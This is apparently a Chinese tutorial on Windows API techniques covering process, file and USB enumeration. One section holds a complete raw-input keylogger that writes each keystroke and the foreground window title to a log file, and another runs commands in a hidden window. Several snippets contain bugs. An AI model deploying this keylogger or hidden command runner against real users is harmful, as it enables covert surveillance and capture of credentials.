WindowsAPI编程核心技术-功能技术

进程遍历

CreateToolhelp32Snapshot

为进程/堆/模块/线程创立快照。

1
2
3
4
5
6
HANDLE WINAPI CreateToolhelp32Snapshot(
    DWORD dwFlags,
    //选项 TH32CS_SNAPPROCESS所有进程 TH32CS_SNAPTHREAD所有线程 TH2CS_SNAPALL所有线程加进程 TH2CS_SNAPHEAPLIST所有th32ProcessID的堆 TH2CS_SNAPMODULE所有th32ProcessID的模块
    DWORD th32ProcessID
    //PID
)//成功返回快照句柄 失败INVALID_HANDLE_VALUE

Process32First

系统快照中遇到的第一个进程信息。

1
2
3
4
BOOL WINAPI Process32First(
    _In_ HANDLE hSnapshot,
    _Out_ LPPROCESSENTRY32 lppe
)//成功TRUE 失败FALSE GetLastError返回ERROR_NO_MORE_FILES表示没有进程存在

Process32Next

系统快照中下一个进程信息。

1
2
3
4
BOOL WINAPI Process32Next(
    _In_ HANDLE hSnapshot,
    _Out_ LPPROCESSENTRY32 lppe
)

例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <TlHelp32.h>
BOOL EnumProcess(VOID) {
	PROCESSENTRY32 pe32 = { 0 };
	pe32.dwSize = sizeof(PROCESSENTRY32);
	HANDLE hProcessSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hProcessSnap)
		return FALSE;
	BOOL bRet = ::Process32First(hProcessSnap, &pe32);
	while (bRet) {
		printf("[%d]\n[%s]\n", pe32.th32ProcessID, pe32.szExeFile);
		bRet = ::Process32Next(hProcessSnap, &pe32);
	};
	::CloseHandle(hProcessSnap);
	return TRUE;
};
BOOL EnumThread(VOID) {
	THREADENTRY32 te32 = { 0 };
	te32.dwSize = sizeof(THREADENTRY32);
	// 获取全部线程快照
	HANDLE hThreadSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (INVALID_HANDLE_VALUE == hThreadSnap)
		return FALSE;
	// 获取快照中第一条信息
	BOOL bRet = ::Thread32First(hThreadSnap, &te32);
	while (bRet) {
		// 显示 Owner Process ID
		printf("[%d]\t", te32.th32OwnerProcessID);
		// 显示 Thread ID
		printf("[%d]\n", te32.th32ThreadID);
		// 获取快照中下一条信息
		bRet = ::Thread32Next(hThreadSnap, &te32);
	};
	// 关闭句柄
	::CloseHandle(hThreadSnap);
	return TRUE;
};
BOOL EnumProcessModule(DWORD dwProcessId) {
	MODULEENTRY32 me32 = { 0 };
	me32.dwSize = sizeof(MODULEENTRY32);
	// 获取指定进程全部模块的快照
	HANDLE hModuleSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessId);
	if (INVALID_HANDLE_VALUE == hModuleSnap)
		return FALSE;
	// 获取快照中第一条信息
	BOOL bRet = ::Module32First(hModuleSnap, &me32);
	while (bRet) {
		// 显示 Process ID
		printf("[%d]\t", me32.th32ProcessID);
		// 显示 模块加载基址
		printf("[0x%p]\t", me32.modBaseAddr);
		// 显示 模块名称
		printf("[%s]\n", me32.szModule);
		// 获取快照中下一条信息
		bRet = ::Module32Next(hModuleSnap, &me32);
	};
	// 关闭句柄
	::CloseHandle(hModuleSnap);
	return TRUE;
};

NtQuerySystemInformation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#include <windows.h>
#include <winternl.h>
#include "resource.h"
#pragma comment(lib, "Ntdll.lib")
// 函数声明
INT_PTR CALLBACK DialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    DialogBoxParam(hInstance, MAKEINTRESOURCE(IDD_MAIN), NULL, DialogProc, NULL);
    return 0;
};
INT_PTR CALLBACK DialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam) {
    static HWND hwndEdit;
    LPVOID lpSystemInformation = NULL;
    PSYSTEM_PROCESS_INFORMATION pSPI = NULL;
    ULONG uReturnLength = 0;
    NTSTATUS status;
    TCHAR szBuf[64] = { 0 };
    switch (uMsg) {
        case WM_INITDIALOG: {
            hwndEdit = GetDlgItem(hwndDlg, IDC_EDIT_PROCESSLIST);
            return TRUE;
        };
        case WM_COMMAND: {
            switch (LOWORD(wParam)) {
                case IDC_BTN_GET: {
                    // 获取所需的缓冲区大小
                    status = NtQuerySystemInformation(SystemProcessInformation, NULL, 0, &uReturnLength);
                    // 分配合适大小的缓冲区再次调用,因为两次调用之间进程列表不一定相同,所以分配的大一倍
                    lpSystemInformation = new BYTE[uReturnLength * 2];
                    status = NtQuerySystemInformation(SystemProcessInformation, lpSystemInformation, uReturnLength * 2, &uReturnLength);
                    if (!NT_SUCCESS(status))
                        MessageBox(hwndDlg, TEXT("NtQuerySystemInformation调用失败"), TEXT("提示"), MB_OK);
                    // 遍历返回的进程信息列表
                    pSPI = (PSYSTEM_PROCESS_INFORMATION)lpSystemInformation;
                    while (TRUE) {
                        wsprintf(szBuf, TEXT("%d\t%s\r\n"), (UINT)(pSPI->UniqueProcessId), pSPI->ImageName.Buffer);
                        SendMessage(hwndEdit, EM_SETSEL, -1, -1);
                        SendMessage(hwndEdit, EM_REPLACESEL, TRUE, (LPARAM)szBuf);
                        // 如果已经遍历完毕
                        if (pSPI->NextEntryOffset == 0)
                            break;
                        // 指向下一个SYSTEM_PROCESS_INFORMATION结构
                        pSPI = (PSYSTEM_PROCESS_INFORMATION)((LPBYTE)pSPI + pSPI->NextEntryOffset);
                    };
                    delete[]lpSystemInformation;
                    break;
                };
                case IDCANCEL: {
                    EndDialog(hwndDlg, 0);
                    break;
                };
            };
            return TRUE;
        };
    };
    return FALSE;
};

文件遍历

FindFirstFile

搜索文件或子目录。

1
2
3
4
HANDLE WINAPI FindFirstFile(
    _In_ LPCTSTR lpFileName,
    _Out_ LPWIN32_FIND_DATA lpFindFileData
)//成功返回句柄 失败返回INVALID_HANDLE_VALUE且lpFindFileData内容不好说

FindNextFile

搜索文件。

1
2
3
4
BOOL WINAPI FindNextFile(
    _In_ HANDLE hFindFile,
    _Out_ LPWIN32_FIND_DATA lpFindFileData
)//成功非0 失败0

WIN32_FIND_DATA

1
2
3
4
5
6
7
8
9
10
11
12
typedef struct _WIN32_FIND_DATA{
    DWORD dwFileAttributes;
    FILETIME ftCreationTime;
    FILETIME ftLastAccessTime;
    FILETIME ftLastWriteTime;
    DWORD nFileSizeHigh;
    DWORD nFileSizeLow;
    DWORD dwReserved0;
    DWORD dwReserved1;
    TCHAR cFileName[MAX_PATH]; //文件名
    TCHAR cAlternateFileName[14];
}WIN32_FIND_DATA,*PWIN32_FIND_DATA,*LPWIN32_FIND_DATA;

例子

遍历某个目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void SearchFile(char* pszDirectory) {
    DWORD dwBufferSize = 2048;
    char* pszFileName = NULL;
    char* pTempSrc = NULL;
    WIN32_FIND_DATA FileData = { 0 };
    BOOL bRet = FALSE;
    pszFileName = new char[dwBufferSize];
    pTempSrc = new char[dwBufferSize];
    ::wsprintf((LPWSTR)pszFileName, L"%s\\*.*", pszDirectory);
    HANDLE hFile = ::FindFirstFile(pszFileName, &FileData);
    if(INVALID_HANDLE_VALUE!=hFile)
        do {
            if ('.' == FileData.cFileName[0])
                continue;
            ::wsprintf((LPWSTR)pTempSrc, L"%s\\%s", pszDirectory, FileData.cFileName);
            if (FileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                SearchFile(pTempSrc);
            else
                printf("%s\n", pTempSrc);
        } while (::FindNextFile(hFile, &FileData));
        ::FindClose(hFile);
        delete[]pTempSrc;
        pTempSrc = NULL;
        delete[]pszFileName;
        pszFileName = NULL;
        return;
};

桌面截图

不会,略。

按键记录

RegisterRawInputDevices

注册提供原始数据的设备。

1
2
3
4
5
BOOL WINAPI RegisterRawInputDevices(
    _In_ PCRAWINPUTDEVICE pRawinputDevices,
    _in_ UINT uiNumDevices,
    _In_ UINT cbSize
)//成功TRUE 失败FALSE

tagRAWINPUTDEVICE

1
2
3
4
5
6
typedef struct tagRAWINPUTDEVICE{
    USHORT usUsagePage;
    USHORT usUsage;
    DWORD dwFlags;
    HWND hwndTarget;
}RAWINPUTDEVICE,*PRAWINPUTDEVICE,*LPRAWINPUTDEVICE;

GetRawInputData

从指定设备获取原始输入。

1
2
3
4
5
6
7
UINT WINAPI GetRawInputData(
    _In_ HRAWINPUT hRawInput,
    _In_ UINT uiCommand,
    _Out_opt_ LPVOID pData,
    _Inout_ PUINT pcbSize,
    _In_ UINT cbSizeHeader
)//当pData为NULL时成功0失败(UINT)-1 当pData不为NULL时成功为复制到pData字节数失败(UINT)-1

例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
#define AddVKey(VK, VKName) { (VK), (VKName) }
struct VKeyInfo {
	USHORT VKey;
	LPCWSTR VKname;
};
static VKeyInfo vkis[] = {
		AddVKey(VK_LBUTTON, L"Left mouse button"),
		AddVKey(VK_RBUTTON, L"Right mouse button"),
		AddVKey(VK_CANCEL, L"Control-break processing"),
		AddVKey(0x04, L"Middle mouse button (three-button mouse)"),
		AddVKey(0x05, L"Windows 2000/XP: X1 mouse button"),
		AddVKey(0x06, L"Windows 2000/XP: X2 mouse button"),
		AddVKey(0x07, L"Undefined"),
		AddVKey(VK_BACK, L"BACKSPACE key"),
		AddVKey(VK_TAB, L"TAB key"),
		AddVKey(0x0A, L"Reserved"),
		AddVKey(0x0B, L"Reserved"),
		AddVKey(VK_CLEAR, L"CLEAR key"),
		AddVKey(VK_RETURN, L"ENTER key"),
		AddVKey(0x0E, L"Undefined"),
		AddVKey(0x0F, L"Undefined"),
		AddVKey(VK_SHIFT, L"SHIFT key"),
		AddVKey(VK_CONTROL, L"CTRL key"),
		AddVKey(VK_MENU, L"ALT key"),
		AddVKey(VK_PAUSE, L"PAUSE key"),
		AddVKey(VK_CAPITAL, L"CAPS LOCK key"),
		AddVKey(VK_KANA, L"Input Method Editor (IME) Kana mode"),
		AddVKey(VK_HANGUL, L"IME Hangul mode"),
		AddVKey(0x16, L"Undefined"),
		AddVKey(VK_JUNJA, L"IME Junja mode"),
		AddVKey(VK_FINAL, L"IME final mode"),
		AddVKey(VK_HANJA, L"IME Hanja mode"),
		AddVKey(VK_KANJI, L"IME Kanji mode"),
		AddVKey(0x1A, L"Undefined"),
		AddVKey(VK_ESCAPE, L"ESC key"),
		AddVKey(VK_CONVERT, L"IME convert"),
		AddVKey(VK_NONCONVERT, L"IME nonconvert"),
		AddVKey(VK_ACCEPT, L"IME accept"),
		AddVKey(VK_MODECHANGE, L"IME mode change request"),
		AddVKey(VK_SPACE, L"SPACEBAR"),
		AddVKey(VK_PRIOR, L"PAGE UP key"),
		AddVKey(VK_NEXT, L"PAGE DOWN key"),
		AddVKey(VK_END, L"END key"),
		AddVKey(VK_HOME, L"HOME key"),
		AddVKey(VK_LEFT, L"LEFT ARROW key"),
		AddVKey(VK_UP, L"UP ARROW key"),
		AddVKey(VK_RIGHT, L"RIGHT ARROW key"),
		AddVKey(VK_DOWN, L"DOWN ARROW key"),
		AddVKey(VK_SELECT, L"SELECT key"),
		AddVKey(VK_PRINT, L"PRINT key"),
		AddVKey(VK_EXECUTE, L"EXECUTE key"),
		AddVKey(VK_SNAPSHOT, L"PRINT SCREEN key"),
		AddVKey(VK_INSERT, L"INSERT key"),
		AddVKey(VK_DELETE, L"DEL key"),
		AddVKey(VK_HELP, L"HELP key"),
		AddVKey(0x30, L"0"),
		AddVKey(0x31, L"1"),
		AddVKey(0x32, L"2"),
		AddVKey(0x33, L"3"),
		AddVKey(0x34, L"4"),
		AddVKey(0x35, L"5"),
		AddVKey(0x36, L"6"),
		AddVKey(0x37, L"7"),
		AddVKey(0x38, L"8"),
		AddVKey(0x39, L"9"),
		AddVKey(0x3A, L"Undefined"),
		AddVKey(0x3B, L"Undefined"),
		AddVKey(0x3C, L"Undefined"),
		AddVKey(0x3D, L"Undefined"),
		AddVKey(0x3E, L"Undefined"),
		AddVKey(0x3F, L"Undefined"),
		AddVKey(0x40, L"Undefined"),
		AddVKey(0x41, L"A"),
		AddVKey(0x42, L"B"),
		AddVKey(0x43, L"C"),
		AddVKey(0x44, L"D"),
		AddVKey(0x45, L"E"),
		AddVKey(0x46, L"F"),
		AddVKey(0x47, L"G"),
		AddVKey(0x48, L"H"),
		AddVKey(0x49, L"I"),
		AddVKey(0x4A, L"J"),
		AddVKey(0x4B, L"K"),
		AddVKey(0x4C, L"L"),
		AddVKey(0x4D, L"M"),
		AddVKey(0x4E, L"N"),
		AddVKey(0x4F, L"O"),
		AddVKey(0x50, L"P"),
		AddVKey(0x51, L"Q"),
		AddVKey(0x52, L"R"),
		AddVKey(0x53, L"S"),
		AddVKey(0x54, L"T"),
		AddVKey(0x55, L"U"),
		AddVKey(0x56, L"V"),
		AddVKey(0x57, L"W"),
		AddVKey(0x58, L"X"),
		AddVKey(0x59, L"Y"),
		AddVKey(0x5A, L"Z"),
		AddVKey(VK_LWIN, L"Left Windows key (Microsoft Natural keyboard)"),
		AddVKey(VK_RWIN, L"Right Windows key (Natural keyboard)"),
		AddVKey(VK_APPS, L"Applications key (Natural keyboard)"),
		AddVKey(0x5E, L"Reserved"),
		AddVKey(VK_SLEEP, L"Computer Sleep key"),
		AddVKey(VK_NUMPAD0, L"Numeric keypad 0 key"),
		AddVKey(VK_NUMPAD1, L"Numeric keypad 1 key"),
		AddVKey(VK_NUMPAD2, L"Numeric keypad 2 key"),
		AddVKey(VK_NUMPAD3, L"Numeric keypad 3 key"),
		AddVKey(VK_NUMPAD4, L"Numeric keypad 4 key"),
		AddVKey(VK_NUMPAD5, L"Numeric keypad 5 key"),
		AddVKey(VK_NUMPAD6, L"Numeric keypad 6 key"),
		AddVKey(VK_NUMPAD7, L"Numeric keypad 7 key"),
		AddVKey(VK_NUMPAD8, L"Numeric keypad 8 key"),
		AddVKey(VK_NUMPAD9, L"Numeric keypad 9 key"),
		AddVKey(VK_MULTIPLY, L"Multiply key"),
		AddVKey(VK_ADD, L"Add key"),
		AddVKey(VK_SEPARATOR, L"Separator key"),
		AddVKey(VK_SUBTRACT, L"Subtract key"),
		AddVKey(VK_DECIMAL, L"Decimal key"),
		AddVKey(VK_DIVIDE, L"Divide key"),
		AddVKey(VK_F1, L"F1 key"),
		AddVKey(VK_F2, L"F2 key"),
		AddVKey(VK_F3, L"F3 key"),
		AddVKey(VK_F4, L"F4 key"),
		AddVKey(VK_F5, L"F5 key"),
		AddVKey(VK_F6, L"F6 key"),
		AddVKey(VK_F7, L"F7 key"),
		AddVKey(VK_F8, L"F8 key"),
		AddVKey(VK_F9, L"F9 key"),
		AddVKey(VK_F10, L"F10 key"),
		AddVKey(VK_F11, L"F11 key"),
		AddVKey(VK_F12, L"F12 key"),
		AddVKey(VK_F13, L"F13 key"),
		AddVKey(VK_F14, L"F14 key"),
		AddVKey(VK_F15, L"F15 key"),
		AddVKey(VK_F16, L"F16 key"),
		AddVKey(VK_F17, L"F17 key"),
		AddVKey(VK_F18, L"F18 key"),
		AddVKey(VK_F19, L"F19 key"),
		AddVKey(VK_F20, L"F20 key"),
		AddVKey(VK_F21, L"F21 key"),
		AddVKey(VK_F22, L"F22 key"),
		AddVKey(VK_F23, L"F23 key"),
		AddVKey(VK_F24, L"F24 key"),
		AddVKey(0x88, L"Unassigned"),
		AddVKey(0x89, L"Unassigned"),
		AddVKey(0x8A, L"Unassigned"),
		AddVKey(0x8B, L"Unassigned"),
		AddVKey(0x8C, L"Unassigned"),
		AddVKey(0x8D, L"Unassigned"),
		AddVKey(0x8E, L"Unassigned"),
		AddVKey(0x8F, L"Unassigned"),
		AddVKey(VK_NUMLOCK, L"NUM LOCK key"),
		AddVKey(VK_SCROLL, L"SCROLL LOCK key"),
		AddVKey(0x92, L"OEM specific"),
		AddVKey(0x93, L"OEM specific"),
		AddVKey(0x94, L"OEM specific"),
		AddVKey(0x95, L"OEM specific"),
		AddVKey(0x96, L"OEM specific"),
		AddVKey(0x97, L"Unassigned"),
		AddVKey(0x98, L"Unassigned"),
		AddVKey(0x99, L"Unassigned"),
		AddVKey(0x9A, L"Unassigned"),
		AddVKey(0x9B, L"Unassigned"),
		AddVKey(0x9C, L"Unassigned"),
		AddVKey(0x9D, L"Unassigned"),
		AddVKey(0x9E, L"Unassigned"),
		AddVKey(0x9F, L"Unassigned"),
		AddVKey(VK_LSHIFT, L"Left SHIFT key"),
		AddVKey(VK_RSHIFT, L"Right SHIFT key"),
		AddVKey(VK_LCONTROL, L"Left CONTROL key"),
		AddVKey(VK_RCONTROL, L"Right CONTROL key"),
		AddVKey(VK_LMENU, L"Left MENU key"),
		AddVKey(VK_RMENU, L"Right MENU key"),
		AddVKey(0xA6, L"Windows 2000/XP: Browser Back key"),
		AddVKey(0xA7, L"Windows 2000/XP: Browser Forward key"),
		AddVKey(0xA8, L"Windows 2000/XP: Browser Refresh key"),
		AddVKey(0xA9, L"Windows 2000/XP: Browser Stop key"),
		AddVKey(0xAA, L"Windows 2000/XP: Browser Search key"),
		AddVKey(0xAB, L"Windows 2000/XP: Browser Favorites key"),
		AddVKey(0xAC, L"Windows 2000/XP: Browser Start and Home key"),
		AddVKey(0xAD, L"Windows 2000/XP: Volume Mute key"),
		AddVKey(0xAE, L"Windows 2000/XP: Volume Down key"),
		AddVKey(0xAF, L"Windows 2000/XP: Volume Up key"),
		AddVKey(0xB0, L"Windows 2000/XP: Next Track key"),
		AddVKey(0xB1, L"Windows 2000/XP: Previous Track key"),
		AddVKey(0xB2, L"Windows 2000/XP: Stop Media key"),
		AddVKey(0xB3, L"Windows 2000/XP: Play/Pause Media key"),
		AddVKey(0xB4, L"Windows 2000/XP: Start Mail key"),
		AddVKey(0xB5, L"Windows 2000/XP: Select Media key"),
		AddVKey(0xB6, L"Windows 2000/XP: Start Application 1 key"),
		AddVKey(0xB7, L"Windows 2000/XP: Start Application 2 key"),
		AddVKey(0xB8, L"Reserved"),
		AddVKey(0xB9, L"Reserved"),
		AddVKey(VK_OEM_1, L"Used for miscellaneous characters; it can vary by keyboard."
						  L"Windows 2000/XP: For the US standard keyboard, the \';:\' key"),
		AddVKey(VK_OEM_PLUS, L"Windows 2000/XP: For any country/region, the \'+\' key"),
		AddVKey(VK_OEM_COMMA, L"Windows 2000/XP: For any country/region, the \',\' key"),
		AddVKey(VK_OEM_MINUS, L"Windows 2000/XP: For any country/region, the \'-\' key"),
		AddVKey(VK_OEM_PERIOD, L"Windows 2000/XP: For any country/region, the \'.\' key"),
		AddVKey(VK_OEM_2, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'/?\' key"),
		AddVKey(VK_OEM_3, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'`~\' key"),
		AddVKey(0xC1, L"Reserved"),
		AddVKey(0xC2, L"Reserved"),
		AddVKey(0xC3, L"Reserved"),
		AddVKey(0xC4, L"Reserved"),
		AddVKey(0xC5, L"Reserved"),
		AddVKey(0xC6, L"Reserved"),
		AddVKey(0xC7, L"Reserved"),
		AddVKey(0xC8, L"Reserved"),
		AddVKey(0xC9, L"Reserved"),
		AddVKey(0xCA, L"Reserved"),
		AddVKey(0xCB, L"Reserved"),
		AddVKey(0xCC, L"Reserved"),
		AddVKey(0xCD, L"Reserved"),
		AddVKey(0xCE, L"Reserved"),
		AddVKey(0xCF, L"Reserved"),
		AddVKey(0xD0, L"Reserved"),
		AddVKey(0xD1, L"Reserved"),
		AddVKey(0xD2, L"Reserved"),
		AddVKey(0xD3, L"Reserved"),
		AddVKey(0xD4, L"Reserved"),
		AddVKey(0xD5, L"Reserved"),
		AddVKey(0xD6, L"Reserved"),
		AddVKey(0xD7, L"Reserved"),
		AddVKey(0xD8, L"Unassigned"),
		AddVKey(0xD9, L"Unassigned"),
		AddVKey(0xDA, L"Unassigned"),
		AddVKey(VK_OEM_4, L"Used for miscellaneous characters; it can vary by keyboard."
						  L"Windows 2000/XP: For the US standard keyboard, the \'[{\' key"),
		AddVKey(VK_OEM_5, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'\\|\' key"),
		AddVKey(VK_OEM_6, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \']}\' key"),
		AddVKey(VK_OEM_7, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'single-quote/double-quote\' key"),
		AddVKey(VK_OEM_8, L"Used for miscellaneous characters; it can vary by keyboard."),
		AddVKey(0xE0, L"Reserved"),
		AddVKey(0xE1, L"OEM specific"),
		AddVKey(VK_OEM_102, L"Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard"),
		AddVKey(0xE3, L"OEM specific"),
		AddVKey(0xE4, L"OEM specific"),
		AddVKey(VK_PROCESSKEY, L"Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key"),
		AddVKey(0xE6, L"OEM specific"),
		AddVKey(0xE7, L"Windows 2000/XP: Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods. For more information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP"),
		AddVKey(0xE8, L"Unassigned"),
		AddVKey(0xE9, L"OEM specific"),
		AddVKey(0xEA, L"OEM specific"),
		AddVKey(0xEB, L"OEM specific"),
		AddVKey(0xEC, L"OEM specific"),
		AddVKey(0xED, L"OEM specific"),
		AddVKey(0xEF, L"OEM specific"),
		AddVKey(0xF0, L"OEM specific"),
		AddVKey(0xF1, L"OEM specific"),
		AddVKey(0xF2, L"OEM specific"),
		AddVKey(0xF3, L"OEM specific"),
		AddVKey(0xF4, L"OEM specific"),
		AddVKey(0xF5, L"OEM specific"),
		AddVKey(VK_ATTN, L"Attn key"),
		AddVKey(VK_CRSEL, L"CrSel key"),
		AddVKey(VK_EXSEL, L"ExSel key"),
		AddVKey(VK_EREOF, L"Erase EOF key"),
		AddVKey(VK_PLAY, L"Play key"),
		AddVKey(VK_ZOOM, L"Zoom key"),
		AddVKey(VK_NONAME, L"Reserved"),
		AddVKey(VK_PA1, L"PA1 key"),
		AddVKey(VK_OEM_CLEAR, L"Clear key"),
		AddVKey(0xFF, L"Unknown Virtual-Key Code")
};
BOOL Init(HWND hWnd) {
	RAWINPUTDEVICE rawinputDevice = { 0 };
	rawinputDevice.usUsagePage = 0x01;
	rawinputDevice.usUsage = 0x06;
	rawinputDevice.dwFlags = RIDEV_INPUTSINK;
	rawinputDevice.hwndTarget = hWnd;
	BOOL bRet = ::RegisterRawInputDevices(&rawinputDevice, 1, sizeof(rawinputDevice));
	if (FALSE == bRet)
		return FALSE;
	return TRUE;
};
LPCWSTR GetKeyName(USHORT VKey) {
	INT i = 0;
	for (i = 0; i < sizeof(vkis); i++)
		if (VKey == vkis[i].VKey)
			return vkis[i].VKname;
	return vkis[--i].VKname;
};
VOID SaveKey(USHORT usVKey) {
	WCHAR szKey[MAX_PATH] = { 0 };
	WCHAR szTitle[MAX_PATH] = { 0 };
	WCHAR szText[MAX_PATH] = { 0 };
	FILE* fp = NULL;
	HWND hForegroundWnd = ::GetForegroundWindow();
	::GetWindowText(hForegroundWnd, szTitle, 256);
	::lstrcpy(szKey, GetKeyName(usVKey));
	::wsprintf(szText, L"[%s]%s\r\n", szTitle, szKey);
	::fopen_s(&fp, "keylog.txt", "a+");
	if (NULL == fp)
		return;
	::fwrite(szText, (1 + ::lstrlen(szText)), 1, fp);
	::fclose(fp);
	return;
};
BOOL GetData(LPARAM lParam) {
	RAWINPUT rawinputData = { 0 };
	UINT uiSize = sizeof(rawinputData);
	::GetRawInputData((HRAWINPUT)lParam, RID_INPUT, &rawinputData, &uiSize, sizeof(RAWINPUTHEADER));
	if (RIM_TYPEKEYBOARD == rawinputData.header.dwType)
		if ((WM_KEYDOWN == rawinputData.data.keyboard.Message) || (WM_SYSKEYDOWN == rawinputData.data.keyboard.Message))
			SaveKey(rawinputData.data.keyboard.VKey);
	return TRUE;
};
BOOL CALLBACK ProgMainDlg(HWND hWnd, UINT uiMsg, WPARAM wParam, LPARAM lParam) {
	if (WM_INITDIALOG == uiMsg)
		Init(hWnd);
	else if (WM_CLOSE == uiMsg)
		::EndDialog(hWnd, NULL);
	else if (WM_CLOSE == uiMsg)
		GetData(lParam);
	return FALSE;
};
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd) {
	::DialogBoxParam(hInstance, (LPCWSTR)101, NULL, (DLGPROC)ProgMainDlg, NULL);
	::ExitProcess(NULL);
	return 0;
};

远程CMD

CreatePipe

创建匿名管道。

1
2
3
4
5
6
7
8
9
BOOL WINAPI CreatePipe(
    _Out_ PHANDLE hReadPipe,
    //可读管道数据文件句柄
    _Out_ PHANDLE hWritePipe,
    //可写管道数据文件句柄
    _In_opt_ LPSECURITY_ATTRIBUTES lpPipeAttributes,
    _In_ DWORD nSize
    //管道缓冲区大小
)//成功非0 失败0

例子

匿名管道可选择一个写端一个读端,具名管道可随意,但同一时间只有一个写端一个读端。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
BOOL PipeCmd(PTCHAR cmd_str, string& outbuf) {
	BOOL bRet = FALSE;
	HANDLE hReadPipe = NULL;
	HANDLE hWritePipe = NULL;
	SECURITY_ATTRIBUTES securityAttributes = { 0 };
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	securityAttributes.bInheritHandle = TRUE;
	securityAttributes.nLength = sizeof(securityAttributes);
	securityAttributes.lpSecurityDescriptor = NULL;
	bRet = ::CreatePipe(&hReadPipe, &hWritePipe, &securityAttributes, 0);
	if (FALSE == bRet)
		return FALSE;
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdError = hWritePipe; //输出重定向到匿名管道写端
	si.hStdOutput = hWritePipe;
	bRet = ::CreateProcess(NULL, cmd_str, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
	if (FALSE == bRet)
		return FALSE;
	::WaitForSingleObject(pi.hThread, INFINITE);
	::WaitForSingleObject(pi.hProcess, INFINITE);
	while (TRUE) {
		char buf[2048]={0};
		DWORD readbytes = 0;
		DWORD availbytes = 0;
		if (!PeekNamedPipe(hReadPipe, NULL, 0, NULL, &availbytes, NULL))
			break;
		if (!availbytes)
			break;
		if (!ReadFile(hReadPipe, buf, min(sizeof(buf) - 1, availbytes), &readbytes, NULL) || !readbytes) //从管道中读
			break;
		buf[readbytes] = 0;
		outbuf += buf;
	};
	::CloseHandle(pi.hThread);
	::CloseHandle(pi.hProcess);
	::CloseHandle(hWritePipe);
	::CloseHandle(hReadPipe);
	return TRUE;
};
int main(int argc,char* argv[]) {
	TCHAR cmd_str[] = L"ping 127.0.0.1";
	string outbuf;
	if (false == PipeCmd(cmd_str, outbuf))
		printf("pipe cmd error.");
	else
		printf("CMD执行结果为:% s", outbuf.c_str());
	system("pause");
	return 0;
};

U盘监控

WM_DEVICECHANGE消息/WindowProc

通知应用程序对设备或计算机的硬件配置进行更改。

1
2
3
4
5
6
7
LRESULT CALLBACK WindowProc(
    HWND hwnd,
    UINT uMsg,
    WPARAM wParam,
    //发生的事件
    LPARAM lParam
)//成功TRUE 拒绝BROADCAST_QUERY_DENY

_DEV_BROADCAST_HDR

略。

DEV_BROADCAST_VOLUMN

略。

例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <Dbt.h>
LRESULT OnDeviceChange(WPARAM wParam, LPARAM lParam) {
	switch (wParam) {
